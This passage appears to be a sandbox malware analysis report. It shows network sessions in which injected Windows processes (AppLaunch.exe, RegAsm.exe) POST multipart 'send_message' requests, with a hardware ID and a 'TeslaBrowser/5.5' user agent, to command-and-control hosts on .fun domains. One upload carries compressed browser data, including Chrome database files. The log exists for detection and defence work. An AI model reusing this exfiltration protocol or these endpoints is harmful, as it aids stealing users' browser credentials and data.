                                                                                                        Oct 3, 2023 18:02:52.592488050 CEST4766OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:52.943912983 CEST4767INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:52 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=72irj9tmqj5ifsmuhnu30qm6d6; expires=Sat, 27 Jan 2024 09:49:31 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:52 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ykumRX1021%2Fribrxf1IiDWbfU1Sj9i3%2FnaQHiNgDya3kAFNk6An137IGaWoRDcsqI1UjZRKF3Z2qzq%2FsVhdVQozKqw%2B%2F8YNbmN0GqbYqWID%2FKFklHpkYo3AM0Al6o4lS5d24JQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 81066976ebdb827b-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:52.943928957 CEST4767INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        43192.168.2.349863172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:53.156429052 CEST4768OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:02:53.156955957 CEST4768OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:53.476747036 CEST4770INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:53 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=nai27jsee726kbvq4tsled2rki; expires=Sat, 27 Jan 2024 09:49:32 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:53 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UKn3INM15zJP%2B2C5RWcV3r22y8g4%2BkQkMDpagUL9BljEVjuvn5GjgSJcbB15vMt2D1BU6zlP9V62Y4WJuvL1jVH3kKhzIcZbHnWZ76SJDVvJfkSFTlZN2rhSqBVsq4Al%2Fwv6gQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8106697a78be399e-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:53.476768970 CEST4770INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        44192.168.2.349864104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:53.938460112 CEST4771OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:02:53.939122915 CEST4771OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:54.267831087 CEST4858INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:54 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=d87boodej256jeeh2l49q88o5j; expires=Sat, 27 Jan 2024 09:49:33 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:54 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5ThKkyFOpWAB5wN7tiIfqTTeFByTlsF9d4UTcKF2lCghCVkQTsZMXA2zMtGhBo9IDFNKVZdFF03BRun5KOpjMc9PiFlAv1YpWSx68Umj%2BbzPL5sFlDfxqCUhq%2FNf37TT1q5FQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8106697f5a4481e5-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:54.268069029 CEST4858INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        45192.168.2.349865172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:54.018714905 CEST4772OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 86379
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:02:54.019516945 CEST4783OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:54.113799095 CEST4784OUTData Raw: dd 6f 6f db 44 1c 07 70 3b 49 e3 b5 5b c7 ba ad 33 55 f7 c0 d5 84 5a 6b 19 a3 aa fa 60 54 88 65 ad 29 d1 b2 74 cb 52 44 85 e0 e4 c6 97 cc aa 1d a7 b6 53 28 3c 4a 07 3c e2 65 4c 13 42 bc 05 9e ec d9 c4 03 de 02 0f 40 02 1e 20 f1 0c c1 13 ee ec 34
                                                                                                        Data Ascii: ooDp;I[3UZk`Te)tRDS(<J<eLB@ 4gm4H}>S+K)A"Bfs[k6xq&'{Zz"HKOx)\W,Ion[Q391}e&|oy'~*HO?x
                                                                                                        Oct 3, 2023 18:02:54.114105940 CEST4787OUTData Raw: 2c 62 69 9b 9e a7 5b a4 ea b4 58 08 b6 1b 4f 6c 35 8d 67 4c 78 84 d1 ae e8 5e 07 77 a2 aa ea b9 ac fc 96 3c aa 1d c3 46 58 0c 3e 2e f8 67 25 79 45 15 db 53 c1 3a 16 4e a4 2c 98 c7 23 f9 24 cc cc 26 4d a8 d7 0d f9 05 4b 53 91 26 1d 51 84 b7 6e b4
                                                                                                        Data Ascii: ,bi[XOl5gLx^w<FX>.g%yES:N,#$&MKS&QnXzp$Kg#>nLk`pWIgu('U]m2]~?-Gv3UT'W,n6-.CW'/.s(|xze9z
                                                                                                        Oct 3, 2023 18:02:54.114183903 CEST4790OUTData Raw: 23 f2 d0 52 df ba fe 95 c3 9d 46 f5 d0 ca 7a bf 78 df 5b 68 ac 75 e4 55 3f 39 b8 b7 72 b6 6c 07 63 b5 d5 4e f2 62 bb af 47 6d 23 93 fc da bb 74 f4 09 d9 46 26 f5 70 2b 4a b7 5e df 63 24 8d 76 bd e9 07 c6 7e e3 ee 8b 21 5f ec c2 17 d3 d6 6e f0 f7
                                                                                                        Data Ascii: #RFzx[huU?9rlcNbGm#tF&p+J^c$v~!_n!fO2/v/8v.SDnT_yP[T}&z?562.?ZiQq[}R|@p]|d1_AuG;5SGw.Y9o
                                                                                                        Oct 3, 2023 18:02:54.114247084 CEST4792OUTData Raw: 47 12 c5 7c 9e cb 16 62 39 b6 b0 62 99 9c 99 8e ec aa 51 60 f3 3c 77 b3 0a 12 ae 51 88 15 84 0c 57 6b b7 56 96 e7 12 9c 70 95 4b c6 e2 1b 05 4e da 5d 5e 10 0b 6c ba 59 21 56 5c 68 a0 33 c9 66 79 2e 1f 2b 6c e4 1a 14 0a d9 02 97 cf 17 73 85 58 9e
                                                                                                        Data Ascii: G|b9bQ`<wQWkVpKN]^lY!V\h3fy.+lsXc%1+X3mM6\r<JHpBJ6m#p+o^PUJe`1neY|yfI!%p4fqrz<*k^bUEs$le<<,N.
                                                                                                        Oct 3, 2023 18:02:54.114314079 CEST4795OUTData Raw: 74 d0 35 5e 19 e7 31 0e bf 21 e6 71 74 05 2f 50 71 b0 51 48 91 3d 23 de d4 0c 61 4d 57 c7 6e 31 d8 58 0d 19 93 41 67 10 8f 8a 8d 1e 74 7a c5 06 32 76 4d c2 42 c5 9b 6c 36 6f 40 f0 f8 6c 1e a7 87 5e 75 ac fa 70 71 d5 df 6a 75 b0 4c e0 70 4e f6 ba
                                                                                                        Data Ascii: t5^1!qt/PqQH=#aMWn1XAgtz2vMBl6o@l^upqjuLpN4-nTf5nM\R"Mbz3tA[BoafxVW,)pl!%1UZzR7Wxxsn?uFF=74cED&1&x!/f3Nqi
                                                                                                        Oct 3, 2023 18:02:54.114666939 CEST4797OUTData Raw: ee d2 4c f1 24 b9 d9 e3 19 f1 d6 39 9e d3 8d 92 f6 c0 be 5f d1 49 5a 68 fb c1 ce 65 7f 46 cb 05 ff d9 09 67 40 10 af 0e f1 cd 97 98 66 bb c9 61 39 be a7 54 ea 9a 5c 31 f7 35 cb 73 38 d6 2a c0 e5 d5 eb 4b df 96 62 d5 a5 b5 d5 b6 a3 34 46 5d c7 25
                                                                                                        Data Ascii: L$9_IZheFg@fa9T\15s8*Kb4F]%snUCvw@|@oX)>3j,VrBVIH*3#5s(k| r|&#.n;o7 -|scjlkOp/wdo"]n\_F=@0r!p_)
                                                                                                        Oct 3, 2023 18:02:54.114732027 CEST4800OUTData Raw: b4 98 c5 29 4b ab 55 14 b5 6d e2 c9 1b f1 31 23 73 7e fb 61 d4 d0 9a ac 5a 9a 42 cd a8 75 1b 1d ab db ae a9 39 bf cd b6 8e 2b 6b 5a 64 ad d5 b6 74 2c e5 b5 26 02 81 80 c8 cc a1 66 d6 ea 15 1a 9e 1e 15 54 2b 12 72 b1 21 d7 cc 8a ae 36 22 74 c8 ec
                                                                                                        Data Ascii: )KUm1#s~aZBu9+kZdt,&fT+r!6"tF'2vg~M)A%=u*>F/Ito{Jz@,-{:E&ELnMfCVjzn](!u7:% F+8?;Htj2i2[S3N~&piIcn
                                                                                                        Oct 3, 2023 18:02:54.114789963 CEST4803OUTData Raw: 86 0d 14 57 c8 51 c8 05 b2 74 0f f7 cc f8 b1 1f b7 55 bf f2 39 cc 5b bf a8 b4 94 e7 ca f2 0c 38 16 d9 b2 af cb 6b 25 f4 8c 40 9f e5 d8 bc 6d af 51 77 ed 3c 9d de 38 bf 6d eb f5 5e 8a 5b aa fe 19 47 0e 0c 6f 3a 69 e8 e0 15 1f 72 f0 b3 a3 17 3f 64
                                                                                                        Data Ascii: WQtU9[8k%@mQw<8m^[Go:ir?dt?*0 xZjND('"aQDr<x0O+Lmb)08^g9L>[d&W^ ^-3*e|/b}iDXbocr]M|O*pqH
                                                                                                        Oct 3, 2023 18:02:54.114846945 CEST4805OUTData Raw: b4 cd f1 44 52 ac df 91 29 a3 0c 4b 0b bc 19 da c8 66 06 af a5 20 79 10 f2 96 97 35 b5 12 ed ce b0 72 c0 5b f1 78 a7 18 92 ba fd f8 68 9b 20 ad 10 e3 cf 5b 0e 8d c3 d3 04 de 6a 65 28 23 80 81 ff b7 be 81 bf ee 6f 8d e7 21 8f 12 c5 78 c6 31 63 fc
                                                                                                        Data Ascii: DR)Kf y5r[xh [je(#o!x1cPK2WBpPKkCW#Chrome/Default/BrowserDB/000005.ldbXS&X`%!A!&B@D]@`25@d\R\-K-l
                                                                                                        Oct 3, 2023 18:02:54.842840910 CEST4865INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:54 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=ji3u7c6eg58vc3l28nrqh8s3um; expires=Sat, 27 Jan 2024 09:49:33 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:54 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UyLmkCRQa5yDCmEN3yKkUBqpi1pI8Q61j2PwbmbGcecVl%2FWdoZ92kjUIzpVxdKSgzK6VN%2BoveQpGAn9vb6cqlPFh%2BbjJQZP8dquz5GCpE1J9xJBGHAn%2Bj%2BTydy8fLRi9iGSZeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8106697fd90107b5-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:54.842853069 CEST4865INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        46192.168.2.349866172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:54.481755018 CEST4862OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:02:54.482410908 CEST4862OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:54.818543911 CEST4864INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:54 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=n3ru6m37uk72fsitj7r1b4p8aq; expires=Sat, 27 Jan 2024 09:49:33 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:54 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k2sC2CEMsdRYk1%2FDSO455w63eW2mELVw3i%2BzyWdSRw8ClS4e1w2DKSK5tfixBuIwgNlHPyPCebgtwjTF%2B955LtOeEjAFkXWBU2doVISThjb%2FFVphBaGo1knn0o7yzfJpg0YU5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 81066982bde20823-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:54.818653107 CEST4864INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        47192.168.2.349867104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:55.034143925 CEST4866OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:02:55.034765005 CEST4866OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:55.405039072 CEST4870INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:55 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=gmfgsov4bquf05onakb4geh0j0; expires=Sat, 27 Jan 2024 09:49:34 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:55 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zNmLwqMr5t20M8g7NTT5Yg5UtjWHcHDn2pr2oy6q%2Br4m2wM5djTWO86RE2YS%2F%2BC1uNPUvmCxz8kemyu2mwJQYuCfm568XbctJSjTMk9RXn1eFvFrV8%2BMmbq7vGJ0PIGWOcyOSg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669862e0d5a8e-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:55.405050993 CEST4870INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        48192.168.2.349868172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:55.060731888 CEST4867OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:02:55.061429977 CEST4867OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:55.400047064 CEST4869INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:55 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=pu5uvb4frpgp5abho0da99qb7g; expires=Sat, 27 Jan 2024 09:49:34 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:55 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rcun5HofKGtv0R5xuLLJDxFr5qbhRAUwiOARxxLGPyxw77IWd%2FLMf7kKOk2ip%2BK8o6jdr6h3eICMUBGRS2WSVMCCwnL7rg7PN%2BUs74MwVDIZE%2F7METgdX1eKpiEw2w4g9WDFkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669865ba405ac-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:55.400064945 CEST4869INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        49192.168.2.349869104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:55.619213104 CEST4871OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:02:55.619890928 CEST4872OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
